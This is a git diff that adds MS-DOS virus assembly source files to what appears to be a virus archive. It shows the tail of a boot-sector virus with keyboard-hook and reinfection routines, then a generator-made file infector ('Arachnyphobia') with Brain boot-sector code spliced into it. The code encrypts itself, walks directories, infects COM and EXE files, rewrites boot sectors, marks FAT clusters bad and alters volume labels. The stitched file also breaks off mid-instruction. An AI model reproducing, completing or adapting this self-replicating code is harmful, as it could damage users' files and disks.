DB 27H,0,5,2 ; + DB 27H,0,6,2 ; + DB 27H,0,7,2 ; + DB 27H,0,8,2 ; + ; +;A7C9A LABEL BYTE ; + DW 00024H ;NOT USED + DB 0ADH ; + DB 07CH ; + DB 0A3H ; + DW 00026H ; + ; +;L7CA1: ; + POP CX ;NOT USED + POP DI ; + POP SI ; + POP ES ; + POP DS ; + POP AX ; + POPF ; + JMP 1111:1111 ; + ; +;-----------------------------------------------------------------------; +; IF ALT & CTRL & DEL THEN ... ; +; IF ALT & CTRL & ? THEN ... ; +;-----------------------------------------------------------------------; +NEW_09: PUSHF ; + STI ; + ; + PUSH AX ; + PUSH BX ; + PUSH DS ; + ; + PUSH CS ;DS=CS + POP DS ; + ; + MOV BX,[ALT_CTRL W] ;BX=SCAN CODE LAST TIME + IN AL,60H ;GET SCAN CODE + MOV AH,AL ;SAVE IN AH + AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH + ; + CMP AL,1DH ;IS IT A [CTRL]... + JNE N09_10 ;...JUMP IF NO + MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP) + JMP N09_30 ; + ; +N09_10: CMP AL,38H ;IS IT AN [ALT]... + JNE N09_20 ;...JUMP IF NO + MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP) + JMP N09_30 ; + ; +N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)... + JNE N09_30 ;...JUMP IF NO + ; + CMP AL,17H ;IF [I]... + JE N09_X0 ;...JUMP IF YES + CMP AL,53H ;IF [DEL]... + JE ACK_KEYBD ;...JUMP IF YES + ; +N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME + ; +N09_90: POP DS ; + POP BX ; + POP AX ; + POPF ; + ; + DB 0EAH ;JMP F000:E987 +OLD_09 DW ? ; + DW 0F000H ; + ; +N09_X0: JMP N09_X1 ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!? + MOV AX,0800H ;AL=0, AH=DELAY ARG + OUT DX,AL ; + CALL DELAY ; + MOV [ALT_CTRL],AX ;AX=0 ; + ; + MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR + INT 10H ; + MOV AH,2 ;SET CURSOR POS 0,0 + XOR DX,DX ; + MOV BH,DH ; PAGE 0 + INT 10H ; + ; + MOV AH,1 ;SET CURSOR TYPE + MOV CX,0607H ; + INT 10H ; + ; + MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW) + CALL DELAY ; + ; + CLI ; + OUT 20H,AL ;SEND EOI TO INT CONTROLLER + ; + MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS + MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!) + MOV SI,offset BEGIN - 128 ; + MOV CX,128 ; + CLD ; + REP MOVSB ; + ; + MOV DS,CX ;CX=0 ;DS=0 + ; + MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR + MOV [(19H*4)+2],CS ; + ; + MOV AX,0040H ;DS = ROM DATA AREA + MOV DS,AX ; + ; + MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0 + INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE) + ; + PUSH DS ;IF BIOS F000:E502 == 21E4... + MOV AX,0F000H ; + MOV DS,AX ; + CMP Word Ptr [0E502H],21E4H ; + POP DS ; + JE R_90 ; + INT 19H ; IF NOT...REBOOT + ; +R_90: JMP 0F000:0E502H ;...DO IT ?!?!?! + ; +;-----------------------------------------------------------------------; +; REBOOT INT VECTOR ; +;-----------------------------------------------------------------------; +NEW_19: XOR AX,AX ; + ; + MOV DS,AX ;DS=0 + MOV AX,[0410] ;AX=EQUIP FLAG + TEST AL,1 ;IF FLOPPY DRIVES ... + JNZ N19_20 ;...JUMP +N19_10: PUSH CS ;ELSE ES=CS + POP ES ; + CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) + INT 18H ;LOAD BASIC + ; +N19_20: MOV CX,0004 ;RETRY COUNT = 4 + ; +N19_22: PUSH CX ; + MOV AH,00 ;RESET DISK + INT 13 ; + JB N19_81 ; + MOV AX,0201 ;READ BOOT SECTOR + PUSH DS ; + POP ES ; + MOV BX,offset BEGIN ; + MOV CX,1 ;TRACK 0, SECTOR 1 + INT 13H ; +N19_81: POP CX ; + JNB N19_90 ; + LOOP N19_22 ; + JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC + ; +;-----------------------------------------------------------------------; +; Reinfection segment. ; +;-----------------------------------------------------------------------; +N19_90: CMP DI,3456 ;IF NOT FLAG SET... + JNZ RE_INFECT ;...RE INFECT + ; +JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR + JMP 0000:7C00H ; + ; +;-----------------------------------------------------------------------; +; Reinfection Segment. ; +;-----------------------------------------------------------------------; +RE_INFECT: ; + MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH + MOV CX,00E6H ; OURSELF + MOV DI,SI ; + PUSH CS ; + POP ES ; + CLD ; + REPE CMPSB ; + JE RI_12 ;IF NOT EQUAL... + ; + INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!) + ; +;MAKE SURE TRACK 39, HEAD 0 FORMATTED ; + MOV BX,offset TABLE ;FORMAT INFO + MOV DX,0000 ;DRIVE A: HEAD 0 + MOV CH,40-1 ;TRACK 39 + MOV AH,5 ;FORMAT + JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW ! + ; +; <<< NO EXECUTION PATH TO HERE >>> ; + JB RI_80 ; + ; +;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0 +RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0 + MOV BX,offset BEGIN ;TRACK 40H + MOV CL,8 ;SECTOR 8 + MOV AX,0301H ;WRITE 1 SECTOR + INT 13H ; + ; + PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW) + POP ES ; + JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE + ; + MOV CX,0001 ;WRITE INFECTED BOOT SECTOR ! + MOV AX,0301 ; + INT 13H ; + JB RI_80 ; IF ERROR...JUMP TO BOOT CODE + ; +RI_12: MOV DI,3456H ;SET "JUST INFECTED ANOTHER ONE"... + INT 19H ;...FLAG AND REBOOT + ; +RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) + DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT) + JMP JMP_BOOT ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS + ; + MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG + MOV BX,0040H ; + MOV DS,BX ; + MOV [0072H],AX ; 0040:0072 = RESET FLAG + JMP N09_90 ; + ; +;-----------------------------------------------------------------------; +; DELAY ; +; ; +; ON ENTRY AH:CX = LOOP COUNT ; +;-----------------------------------------------------------------------; +DELAY: SUB CX,CX ; +D_01: LOOP $ ; + SUB AH,1 ; + JNZ D_01 ; + RET ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +A7DF4 DB 27H,00H,8,2 + +COUNTER_1 DW 001CH +ALT_CTRL DW 0 +A7DFC DB 27H,0,8,2 + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.alchemy.asm b/MSDOS/Virus.MSDOS.Unknown.alchemy.asm new file mode 100644 index 00000000..6e6a62ed --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.alchemy.asm @@ -0,0 +1,1039 @@ +; Alchemy.asm : [Arachnyphobia] by Abraxas +; Created wik the Phalcon/Skism Mass-Produced Code Generator +; from the configuration file skeleton.cfg + +.model tiny ; Handy directive +.code ; Virus code segment + org 100h ; COM file starting IP + +id = 'DA' ; ID word for EXE infections +entry_point: db 0e9h,0,0 ; jmp decrypt + +decrypt: ; handles encryption and decryption +patch_startencrypt: + mov bx,offset startencrypt ; start of decryption + mov cx,(offset heap - offset startencrypt)/2 ; iterations +decrypt_loop: + db 2eh,81h,07h ; add word ptr cs:[bx], xxxx +decrypt_value dw 0 ; initialised at zero for null effect + inc bx ; calculate new decryption location + inc bx + loop decrypt_loop ; decrypt mo' +startencrypt: + call next ; calculate delta offset +next: pop bp ; bp = IP next + sub bp,offset next ; bp = delta offset + + cmp sp,id ; COM or EXE? + je restoreEXE +restoreCOM: + lea si,[bp+save3] + mov di,100h + push di ; For later return + movsb + jmp short restoreEXIT +restoreEXE: + push ds + push es + push cs ; DS = CS + pop ds + push cs ; ES = CS + pop es + lea si,[bp+jmpsave2] + lea di,[bp+jmpsave] + movsw + movsw + movsw +restoreEXIT: + movsw + + mov byte ptr [bp+numinfec],1 ; reset infection counter + + mov ah,1Ah ; Set new DTA + lea dx,[bp+newDTA] ; new DTA @ DS:DX + int 21h + + mov ah,47h ; Get current directory + mov dl,0 ; Current drive + lea si,[bp+origdir] ; DS:SI->buffer + int 21h + mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR + + mov ax,3524h ; Get int 24 handler + int 21h ; to ES:BX + mov word ptr [bp+oldint24],bx; Save it + mov word ptr [bp+oldint24+2],es + mov ah,25h ; Set new int 24 handler + lea dx,[bp+offset int24] ; DS:DX->new handler + int 21h + push cs ; Restore ES + pop es ; 'cuz it was changed + +dir_scan: ; "dot dot" traversal + lea dx,[bp+exe_mask] + call infect_mask + lea dx,[bp+com_mask] + call infect_mask + mov ah,3bh ; change directory + lea dx,[bp+dot_dot] ; "cd .." + int 21h + jnc dir_scan ; go back for mo! + +done_infections: + mov ah,2ah ; Get current date + int 21h + cmp dh,10 ; Check month + jb exit_virus + cmp dl,14 ; Check date + jb exit_virus + cmp cx,1991 ; Check year + jae activate + +exit_virus: + mov ax,2524h ; Restore int 24 handler + lds dx,[bp+offset oldint24] ; to original + int 21h + push cs + pop ds + + mov ah,3bh ; change directory + lea dx,[bp+origdir-1] ; original directory + int 21h + + mov ah,1ah ; restore DTA to default + mov dx,80h ; DTA in PSP + cmp sp,id-4 ; EXE or COM? + jz returnEXE +returnCOM: + int 21h + retn ; 100h is on stack +returnEXE: + pop es + pop ds + int 21h + mov ax,es ; AX = PSP segment + add ax,10h ; Adjust for PSP + add word ptr cs:[bp+jmpsave+2],ax + add ax,word ptr cs:[bp+stacksave+2] + cli ; Clear intrpts for stack manipulation + mov sp,word ptr cs:[bp+stacksave] + mov ss,ax + sti + db 0eah ; jmp ssss:oooo +jmpsave dd ? ; Original CS:IP +stacksave dd ? ; Original SS:SP +jmpsave2 db ? ; Actually four bytes +save3 db 0cdh,20h,0 ; First 3 bytes of COM file +stacksave2 dd ? + +activate: ; Conditions satisfied + org 0 + + cli + jmp entervirus +idbytes db 34h, 12h +firsthead db 0 +firstsector dw 2707h +curhead db 0 +cursector dw 1 + db 0, 0, 0, 0 + db 'Welcome to the Dungeon ' +copyright db '(c) 1986 Brain' + db 17h + db '& Amjads (pvt) Ltd VIRUS_SHOE ' + db ' RECORD v9.0 Dedicated to th' + db 'e dynamic memories of millions o' + db 'f virus who are no longer with u' + db 's today - Thanks GOODNESS!! ' + db ' BEWARE OF THE er..VIRUS : \th' + db 'is program is catching prog' + db 'ram follows after these messeges' + db '..... $' + db '#@%$' + db '@!! ' +entervirus: + mov ax,cs + mov ds,ax ; ds = 0 + mov ss,ax ; set stack to after + mov sp,0F000h ; virus + sti + mov al,ds:[7C00h+offset firsthead] + mov ds:[7C00h+offset curhead],al + mov cx,ds:[7C00h+offset firstsector] + mov ds:[7C00h+offset cursector],cx + call calcnext + mov cx,5 ; read five sectors + mov bx,7C00h+200h ; after end of virus + +loadnext: + call readdisk + call calcnext + add bx,200h + loop loadnext + + mov ax,word ptr ds:[413h] ; Base memory size in Kb + sub ax,7 ; - 7 Kb + mov word ptr ds:[413h],ax ; Insert as new value + mov cl,6 + shl ax,cl ; Convert to paragraphs + mov es,ax + mov si,7C00h ; Copy from virus start + mov di,0 ; to start of memory + mov cx,1004h ; Copy 1004h bytes + cld + rep movsb + push es + mov ax,200h + push ax + retf ; return to old boot sector + +readdisk: + push cx + push bx + mov cx,4 ; Try 4 times + +tryread: + push cx + mov dh,ds:[7C00h+offset curhead] + mov dl,0 ; Read sector from default + mov cx,ds:[7C00h+offset cursector] + mov ax,201h ; Disk to memory at es:bx + int 13h + jnc readOK + mov ah,0 ; Reset disk + int 13h ; (force read track 0) + pop cx + loop tryread + + int 18h ; ROM basic on failure +readOK: + pop cx + pop bx + pop cx + retn + +calcnext: + mov al,byte ptr ds:[7C00h+offset cursector] + inc al + mov byte ptr ds:[7C00h+offset cursector],al + cmp al,0Ah + jne donecalc + mov byte ptr ds:[7C00h+offset cursector],1 + mov al,ds:[7C00h+offset curhead] + inc al + mov ds:[7C00h+offset curhead],al + cmp al,2 + jne donecalc + mov byte ptr ds:[7C00h+offset curhead],0 + inc byte ptr ds:[7C00h+offset cursector+1] +donecalc: + retn + +; the following is a collection of garbage bytes + db 00h, 00h, 00h, 00h, 32h,0E3h + db 23h, 4Dh, 59h,0F4h,0A1h, 82h + db 0BCh,0C3h, 12h, 00h, 7Eh, 12h + db 0CDh, 21h,0A2h, 3Ch, 5Fh +a_data dw 050Ch +; Second part of the virus begins here + jmp short entersecondpart + db '(c) 1986 Brain & Amjads (pvt) Ltd ',0 +readcounter db 4 ; keep track of # reads +curdrive db 0 +int13flag db 0 + +entersecondpart: + mov cs:readcounter,1Fh + xor ax,ax + mov ds,ax ; ds -> interrupt table + mov ax,ds:[13h*4] + mov ds:[6Dh*4],ax + mov ax,ds:[13h*4+2] + mov ds:[6Dh*4+2],ax + mov ax,offset int13 ; 276h + mov ds:[13h*4],ax + mov ax,cs + mov ds:[13h*4+2],ax + mov cx,4 ; 4 tries + xor ax,ax + mov es,ax ; es -> interrupt table + +tryreadbootsector: + push cx + mov dh,cs:firsthead + mov dl,0 + mov cx,cs:firstsector + mov ax,201h ; read from default disk + mov bx,7C00h + int 6Dh ; int 13h + jnc readbootOK + mov ah,0 + int 6Dh ; int 13h + pop cx + loop tryreadbootsector + + int 18h ; ROM basic on failure +readbootOK: ; return control to + ; original boot sector +;* jmp far ptr 0000:7C00h + db 0EAh, 00h, 7Ch, 00h, 00h + nop ; MASM NOP!!! +int13: + sti + cmp ah,2 ; if not read request, + jne doint13 ; do not go further + cmp dl,2 ; if after second floppy, + ja doint13 ; do not go further + cmp ch,0 ; if not reading boot sector, + jne regularread ; go handle as usual + cmp dh,0 ; if boot sector, + je readboot ; do I<-/>/\|> stuff +regularread: + dec cs:readcounter ; Infect after 4 reads + jnz doint13 ; If counter still OK, don't + ; do anything else + jmp short readboot ; Otherwise, try to infect +doint13: + jmp exitint13h +readboot: +; FINISH THIS! + mov cs:int13flag,0 ; clear flag + mov cs:readcounter,4 ; reset counter + push ax + push bx + push cx + push dx + mov cs:curdrive,dl + mov cx,4 + +tryreadbootblock: + push cx + mov ah,0 ; Reset disk + int 6Dh + jc errorreadingbootblock ; Try again + mov dh,0 + mov cx,1 + mov bx,offset readbuffer ; buffer @ 6BEh + push es + mov ax,cs + mov es,ax + mov ax,201h + int 6Dh ; Read boot sector + pop es + jnc continuestuff ; continue if no error +errorreadingbootblock: + pop cx + loop tryreadbootblock + + jmp short resetdisk ; too many failures + nop +continuestuff: + pop cx ; get system id in boot block + mov ax,word ptr cs:[offset readbuffer+4] + cmp ax,1234h ; already infected? + jne dodisk ; if not, infect it + mov cs:int13flag,1 ; flag prev. infection + jmp short noreset +dodisk: + push ds + push es + mov ax,cs + mov ds,ax + mov es,ax + push si + call writevirus ; infect the disk + jc failme ; exit on failure + mov cs:int13flag,2 ; flag success + call changeroot ; manipulate volume label +failme: + pop si + pop es + pop ds + jnc noreset ; don't reset on success +resetdisk: + mov ah,0 ; reset disk + int 6Dh ; int 13h +noreset: + pop dx + pop cx + pop bx + pop ax + cmp cx,1 + jne exitint13h + cmp dh,0 + jne exitint13h + cmp cs:int13flag,1 ; already infected? + jne wasntinfected ; if wasn't, go elsewhere + mov cx,word ptr cs:[offset readbuffer+7] + mov dx,word ptr cs:[offset readbuffer+5] + mov dl,cs:curdrive ; otherwise, read real + jmp short exitint13h ; boot sector +wasntinfected: + cmp cs:int13flag,2 ; successful infection? + jne exitint13h ; if not, just do call + mov cx,cs:firstsector + mov dh,cs:firsthead +exitint13h: + int 6Dh ; int 13h + retf 2 + db 15 dup (0) + +FATManip: ; returns al as error code + jmp short delvedeeper + nop +FATManipreadcounter dw 3 + db ' (c) 1986 Brain & Amjads (pvt) Ltd' +delvedeeper: + call readFAT ; Get FAT ID byte + mov ax,word ptr ds:[offset readbuffer] + cmp ax,0FFFDh ; is it 360K disk? + je is360Kdisk ; continue if so + mov al,3 ; al=3 == not good disk + stc ; flag error + retn ; and exit +is360Kdisk: + mov cx,37h + mov FATManipreadcounter,0 ; none found yet +checknextsector: + call FATentry12bit ; get entry in FAT + cmp ax,0 ; unused? + jne notunused + inc FATManipreadcounter ; one more found unused + cmp FATManipreadcounter,3 ; If need more, + jne tryanother ; go there + jmp short markembad ; found 3 consecutive + nop ; empty sectors +notunused: + mov FATManipreadcounter,0 ; must start over +tryanother: + inc cx ; try next sector + cmp cx,163h ; end of disk? + jne checknextsector ; if not, continue + mov al,1 ; al=1 == none empty + stc ; Indicate error + retn +markembad: + mov dl,3 ; 3 times +markanotherbad: + call markbad12bit + dec cx + dec dl + jnz markanotherbad + inc cx + call calc1sttrack + call writeFAT ; update FAT + mov al,0 ; al=0 == ok + clc ; indicate success + retn + +markbad12bit: + push cx + push dx + mov si,offset readbuffer ; si -> buffer + mov al,cl + shr al,1 + jc low_12 ; low bits + call clus2offset12bit + mov ax,[bx+si] ; get FAT entry + and ax,0F000h ; mark it bad + or ax,0FF7h + jmp short putitback ; and put it back + nop +low_12: + call clus2offset12bit + mov ax,[bx+si] ; get FAT entry + and ax,0Fh ; mark it bad + or ax,0FF70h +putitback: + mov [bx+si],ax ; replace FAT entry + mov word ptr ds:[400h][bx+si],ax ; in two places + pop dx + pop cx + retn + +FATentry12bit: + push cx + mov si,offset readbuffer ; si->buffer + mov al,cl + shr al,1 +; Part 3 of the virus starts here + jc want_high_12 + call clus2offset12bit + mov ax,[bx+si] + and ax,0FFFh + jmp short exitFATentry12bit + nop +want_high_12: + call clus2offset12bit ; xxxxxxxxxxxx0000 + mov ax,[bx+si] ; ^^^^^^^^^^^^wanted + and ax,0FFF0h ; mask wanted bits + mov cl,4 ; and move to correct + shr ax,cl ; position +exitFATentry12bit: + pop cx + retn + +clus2offset12bit: + push dx + mov ax,3 + mul cx + shr ax,1 ; ax = cx*1.5 + mov bx,ax + pop dx + retn + +readFAT: + mov ah,2 ; read + call FAT_IO + retn + +writeFAT: + mov ah,3 ; write + call FAT_IO + retn + +FAT_IO: + mov cx,4 ; try four times +FAT_IOLoop: + push cx + push ax + mov ah,0 ; reset disk + int 6Dh ; int 13h + pop ax + jc tryFAT_IOagain + mov bx,offset readbuffer + mov al,4 ; 4 sectors + mov dh,0 ; head 0 + mov dl,curdrive + mov cx,2 ; sector 2 + push ax ; (FAT) + int 6Dh ; int 13h + pop ax + jnc exitFAT_IO +tryFAT_IOagain: + pop cx + loop FAT_IOLoop + + pop ax + pop ax + mov al,2 + stc ; mark error + retn +exitFAT_IO: + pop cx + retn + +calc1sttrack: + push cx + sub cx,2 + shl cx,1 ; 2 sectors/cluster + add cx,0Ch ; start of data area + mov ax,cx ; ax = sector + mov cl,12h ; 4096 + div cl ; ax/4096 = al rem ah + mov byte ptr firstsector+1,al + mov firsthead,0 + inc ah + cmp ah,9 ; past track 9? + jbe notpasttrack9 ; nope, we are ok + sub ah,9 ; otherwise, adjust + mov firsthead,1 +notpasttrack9: + mov byte ptr firstsector,ah + pop cx + retn + + db 0, 0, 0, 0, 0, 0 +r_or_w_root db 3 +entrycount dw 35h + +tempsave1 dw 303h +tempsave2 dw 0EBEh +tempsave3 dw 1 +tempsave4 dw 100h + db 0E0h,0D8h, 9Dh,0D7h,0E0h, 9Fh + db 8Dh, 98h, 9Fh, 8Eh,0E0h + db ' (c) ashar $' +changeroot: + call readroot ; read in root directory + jc donotchangeroot + push di + call changevolume ; change volume label + pop di + jc donotchangeroot + call writeroot ; write back new root dir +donotchangeroot: + retn +; The following is just garbage bytes + db 0BBh, 9Bh, 04h,0B9h, 0Bh + db 0,8Ah,7,0F6h,0D8h,88h,4,46h,43h + db 0E2h,0F6h,0B0h,8,88h,4,0F8h,0C3h + db 0C6h, 06h + +changevolume: + mov entrycount,6Ch + mov si,offset readbuffer+40h; 3nd dir entry + mov tempsave1,dx + mov ax,entrycount ; 6Ch + shr ax,1 + mov tempsave3,ax ; 36h + shr ax,1 + mov tempsave2,ax ; 1Bh + xchg ax,cx + and cl,43h ; cx = 3 + mov di,tempsave2 + add di,1E3h ; di = 01FE +findlabel: + mov al,[si] + cmp al,0 + je dolabel ; no mo entries + mov al,[si+0Bh] ; attribute byte + and al,8 ; volume label? + cmp al,8 ; yes? + je dolabel ; then change it! + add si,20h ; go to next directory entry + dec entrycount + jnz findlabel ; loop back + stc ; Error! + retn + db 8Bh +dolabel: + mov bx,[di] ; offset a_data + xor bx,tempsave3 ; bx = 53Ah + mov tempsave3,si ; si->direntry + cli + mov ax,ss + mov tempsave1,ax + mov tempsave2,sp + mov ax,cs + mov ss,ax + mov sp,tempsave3 + add sp,0Ch ;->reserved area + mov cl,51h + add dx,444Ch + mov di,2555h + mov cx,0C03h + repe cmpsw + mov ax,0B46h + mov cx,3 + rol ax,cl ; ax = 5A30h + mov tempsave3,ax + mov cx,5 + mov dx,8 + sub tempsave3,5210h ; 820h + push tempsave3 ; store attributes/reserved +; I haven't commented the remainder of this procedure. +; It basically changes the volume label to read "(c) Brain" + +; Comment mode OFF + +dowhatever: + mov ah,[bx] ; 5a3h + inc bx + mov dl,ah + shl dl,1 + jc dowhatever +searchstuff: + mov dl,[bx] ; dl=C2h + inc bx ; bx=53Eh + mov al,dl + shl dl,1 + jc searchstuff + add ax,1D1Dh + push ax + inc tempsave3 + db 73h, 01h ; jnc $+3 + db 0EAh,0E2h,0E1h, 8Bh, 26h; jmp 268B:E1E2 + xchg bp,ax + add al,0A1h + xchg bx,ax + add al,8Eh + sar bl,1 + add dh,[bp+si] + clc + ret + ;db 95h, 04h,0A1h, 93h, 04h, 8Eh + ;db 0D0h,0FBh, 02h, 32h,0F8h,0C3h + +; Comment mode ON + +readroot: + mov r_or_w_root,2 ; set action code + jmp short do_rw_root ; easier to do w/ + nop ; mov ah, 2 +writeroot: + mov r_or_w_root,3 + jmp short do_rw_root ; this is somewhat useless + nop +do_rw_root: + mov dh,0 ; head 0 + mov dl,curdrive + mov cx,6 ; sector 6 + mov ah,r_or_w_root + mov al,4 ; 4 sectors + mov bx,offset readbuffer + call doint13h + jc exit_rw_root ; quit on error + mov cx,1 + mov dh,1 ; head 1 + mov ah,r_or_w_root + mov al,3 + add bx,800h + call doint13h + +exit_rw_root: + retn + +doint13h: + mov tempsave1,ax + mov tempsave2,bx + mov tempsave3,cx + mov tempsave4,dx + mov cx,4 + +doint13hloop: + push cx + mov ah,0 ; Reset disk + int 6Dh + jc errordoingint13h + mov ax,tempsave1 + mov bx,tempsave2 + mov cx,tempsave3 + mov dx,tempsave4 + int 6Dh ; int 13h + jnc int13hsuccess +errordoingint13h: + pop cx + loop doint13hloop + + stc ; indicate error + retn +int13hsuccess: + pop cx + retn + + db 0, 0, 0 +; Part 4 of the virus starts here +tempstorecx dw 3 +readwritecurrentdata dw 301h + +writevirus: + call FATManip + jc exitwritevirus + mov cursector,1 + mov curhead,0 + mov bx,offset readbuffer + call readcurrent + mov bx,offset readbuffer + mov ax,firstsector + mov cursector,ax + mov ah,firsthead + mov curhead,ah + call writecurrent + call calcnextsector + mov cx,5 + mov bx,200h +writeanothersector: + mov tempstorecx,cx + call writecurrent + call calcnextsector + add bx,200h + mov cx,tempstorecx + loop writeanothersector + + mov curhead,0 + mov cursector,1 + mov bx,0 + call writecurrent + clc ; indicate success +exitwritevirus: + retn + + +readcurrent: + mov readwritecurrentdata,201h + jmp short doreadwrite + nop +writecurrent: + mov readwritecurrentdata,301h + jmp short doreadwrite ; This is pointless. + nop +doreadwrite: + push bx + mov cx,4 + +tryreadwriteagain: + push cx + mov dh,curhead + mov dl,curdrive + mov cx,cursector + mov ax,readwritecurrentdata ; read or write? + int 6Dh ; int 13h + jnc readwritesuccessful + mov ah,0 ; reset disk + int 6Dh ; int 13h + pop cx + loop tryreadwriteagain + + pop bx + pop bx + stc ; Indicate error + retn +readwritesuccessful: + pop cx + pop bx + retn + + +calcnextsector: + inc byte ptr cursector ; next sector + cmp byte ptr cursector,0Ah + jne donecalculate ; finished calculations + mov byte ptr cursector,1 ; clear sector # + inc curhead ; and go to next head + cmp curhead,2 ; if not too large, + jne donecalculate ; we are done + mov curhead,0 ; otherwise clear head # + inc byte ptr cursector+1 ; and advance cylinder +donecalculate: + retn + + db 64h, 74h, 61h + +; read buffer starts here +; insert your favorite boot block below... +readbuffer: + jmp exit_virus + +creator db '[Z10]',0 ; Mass Produced Code Generator +virusname db '[Arachnyphobia]',0 +author db 'Abraxas',0 + +infect_mask: + mov ah,4eh ; find first file + mov cx,7 ; any attribute +findfirstnext: + int 21h ; DS:DX points to mask + jc exit_infect_mask ; No mo files found + + mov al,0h ; Open read only + call open + + mov ah,3fh ; Read file to buffer + lea dx,[bp+buffer] ; @ DS:DX + mov cx,1Ah ; 1Ah bytes + int 21h + + mov ah,3eh ; Close file + int 21h + + cmp word ptr [bp+buffer],'ZM'; EXE? + jz checkEXE ; Why yes, yes it is! +checkCOM: + mov ax,word ptr [bp+newDTA+35] ; Get tail of filename + cmp ax,'DN' ; Ends in ND? (commaND) + jz find_next + + mov ax,word ptr [bp+newDTA+1Ah] ; Filesize in DTA + cmp ax,12000 ; Is it too small? + jb find_next + + cmp ax,65535-(endheap-decrypt) ; Is it too large? + ja find_next + + mov bx,word ptr [bp+buffer+1]; get jmp location + add bx,heap-decrypt+3 ; Adjust for virus size + cmp ax,bx + je find_next ; already infected + jmp infect_com +checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected? + jnz infect_exe +find_next: + mov ah,4fh ; find next file + jmp short findfirstnext +exit_infect_mask: ret + +infect_exe: + les ax, dword ptr [bp+buffer+14h] ; Save old entry point + mov word ptr [bp+jmpsave2], ax + mov word ptr [bp+jmpsave2+2], es + + les ax, dword ptr [bp+buffer+0Eh] ; Save old stack + mov word ptr [bp+stacksave2], es + mov word ptr [bp+stacksave2+2], ax + + mov ax, word ptr [bp+buffer + 8] ; Get header size + mov cl, 4 ; convert to bytes + shl ax, cl + xchg ax, bx + + les ax, [bp+offset newDTA+26]; Get file size + mov dx, es ; to DX:AX + push ax + push dx + + sub ax, bx ; Subtract header size from + sbb dx, 0 ; file size + + mov cx, 10h ; Convert to segment:offset + div cx ; form + + mov word ptr [bp+buffer+14h], dx ; New entry point + mov word ptr [bp+buffer+16h], ax + + mov word ptr [bp+buffer+0Eh], ax ; and stack + mov word ptr [bp+buffer+10h], id + + pop dx ; get file length + pop ax + + add ax, heap-decrypt ; add virus size + adc dx, 0 + + mov cl, 9 + push ax + shr ax, cl + ror dx, cl + stc + adc dx, ax + pop ax + and ah, 1 ; mod 512 + + mov word ptr [bp+buffer+4], dx ; new file size + mov word ptr [bp+buffer+2], ax + + push cs ; restore ES + pop es + + push word ptr [bp+buffer+14h] ; needed later + mov cx, 1ah + jmp short finishinfection +infect_com: ; ax = filesize + mov cx,3 + sub ax,cx + lea si,[bp+offset buffer] + lea di,[bp+offset save3] + movsw + movsb + mov byte ptr [si-3],0e9h + mov word ptr [si-2],ax + add ax,103h + push ax ; needed later +finishinfection: + push cx ; Save # bytes to write + xor cx,cx ; Clear attributes + call attributes ; Set file attributes + + mov al,2 + call open + + mov ah,40h ; Write to file + lea dx,[bp+buffer] ; Write from buffer + pop cx ; cx bytes + int 21h + + mov ax,4202h ; Move file pointer + xor cx,cx ; to end of file + cwd ; xor dx,dx + int 21h + +get_encrypt_value: + mov ah,2ch ; Get current time + int 21h ; dh=sec,dl=1/100 sec + or dx,dx ; Check if encryption value = 0 + jz get_encrypt_value ; Get another if it is + mov [bp+decrypt_value],dx ; Set new encryption value + lea di,[bp+code_store] + mov ax,5355h ; push bp,push bx + stosw + lea si,[bp+decrypt] ; Copy encryption function + mov cx,startencrypt-decrypt ; Bytes to move + push si ; Save for later use + push cx + rep movsb + + xor byte ptr [bp+decrypt_loop+2],028h ; flip between add/sub + + lea si,[bp+write] ; Copy writing function + mov cx,endwrite-write ; Bytes to move + rep movsb + pop cx + pop si + pop dx ; Entry point of virus + push di + push si + push cx + rep movsb ; Copy decryption function + mov ax,5b5dh ; pop bx,pop bp + stosw + mov al,0c3h ; retn + stosb + + add dx,offset startencrypt - offset decrypt ; Calculate new + mov word ptr [bp+patch_startencrypt+1],dx ; starting offset of + call code_store ; decryption + pop cx + pop di + pop si + rep movsb ; Restore decryption function + + mov ax,5701h ; Restore creation date/time + mov cx,word ptr [bp+newDTA+16h] ; time + mov dx,word ptr [bp+newDTA+18h] ; date + int 21h + + mov ah,3eh ; Close file + int 21h + + mov ch,0 + mov cl,byte ptr [bp+newDTA+15h] ; Restore original + call attributes ; attributes + + dec byte ptr [bp+numinfec] ; One mo infection + jnz mo_infections ; Not enough + pop ax ; remove call from stack + jmp done_infections +mo_infections: jmp find_next + +open: + mov ah,3dh + 